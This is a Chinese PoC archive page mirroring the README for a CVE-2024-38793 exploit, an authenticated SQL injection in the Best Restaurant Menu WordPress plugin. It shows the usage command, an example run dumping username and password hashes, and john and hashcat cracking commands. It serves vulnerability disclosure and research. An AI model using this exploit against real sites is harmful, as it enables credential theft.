支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: c9bc8a77e74b8228bdb2155b01891a8ed1d04aef

来源
https://github.com/ret2desync/CVE-2024-38793-PoC
关联漏洞
标题:WordPress plugin Best Restaurant Menu 安全漏洞 (CVE-2024-38793)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Best Restaurant Menu 1.4.1及之前版本存在安全漏洞,该漏洞源于对特殊元素的不当中和,导致SQL注入漏洞。
Description
Proof of Concept code for exploitation of CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - Authenticated (Contributor+) SQL Injection)
介绍
# CVE-2024-38793-PoC
Proof of Concept code for exploitation of CVE-2024-38793 (Best Restaurant Menu by PriceListo &lt;= 1.4.1 - Authenticated (Contributor+) SQL Injection).
## Proof Of Concept
This is a proof of concept exploit for the vulnerability [CVE-2024-38793](https://patchstack.com/database/vulnerability/best-restaurant-menu-by-pricelisto/wordpress-best-restaurant-menu-by-pricelisto-plugin-1-4-1-sql-injection-vulnerability), an SQL injection vulnerability for versions of the WordPress plugin [Best Restaurant Menu a.k.a Great Restaurant Menu WP](https://wordpress.org/plugins/best-restaurant-menu-by-pricelisto/) before 1.4.2.

The vulnerability occurs because of a lack on input sanitization on the groups argument when using the brm_restaurant_menu shortcode.

**Note**: This does require the credentials of a user with at least Contributor level privileges.

The code will attempt to grab the username and password hashes from the WordPress users table.

## Usage
```
CVE-2024-38793 Exploit (Best Restaurant Menu by PriceListo Version <= 1.4.1) PoC
         Requires Contributor+ Privileges on a WordPress instance with the plugin installed
         Credit: @ret2desync
         Will attempt to create a new post, exploit the vulnerability and extract all users usernames and password hashes
         Example usage:
         python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password --proxy "http://127.0.0.1:8080"
usage: CVE-2024-38793.py [-h] -t TARGET -u USERNAME -p PASSWORD [--proxy PROXY] [-o OUTFILE]

```
## Example run
```
python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password      
CVE-2024-38793 Exploit (Best Restaurant Menu by PriceListo Version <= 1.4.1) PoC
         Requires Contributor+ Privileges on a WordPress instance with the plugin installed
         Credit: @ret2desync
         Will attempt to create a new post, exploit the vulnerability and extract all users usernames and password hashes
         Example usage:
         python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password --proxy "http://127.0.0.1:8080"
[*] Successfully signed in to Wordpress using contributor password
[*] Successfully created new post, id: 219
[*] Successfully saved new post with exploit, post id: 219
[*] Successfully grabbed usernames and password hashes
[*] Found 2 sets of credentials
[***                Credentials                ***]
root:$P$BG.b.gHI.byee9PWs8GspKxY9qp0Cm0
contributor:$P$BBVRINbQUo28Tpbp3H7/iITT/Eo9aR0
[*] Crack hashes with: 
 john <hashes_file> --wordlist=<wordlist> 
 hashcat -m 400 -a 0 --username <hashes_file> <wordlist>
[*] Exploit completed successfully
```
文件快照

 [4.0K]  /data/pocs/c9bc8a77e74b8228bdb2155b01891a8ed1d04aef
├── [7.1K]  CVE-2024-38793.py
├── [1.0K]  LICENSE
└── [2.6K]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。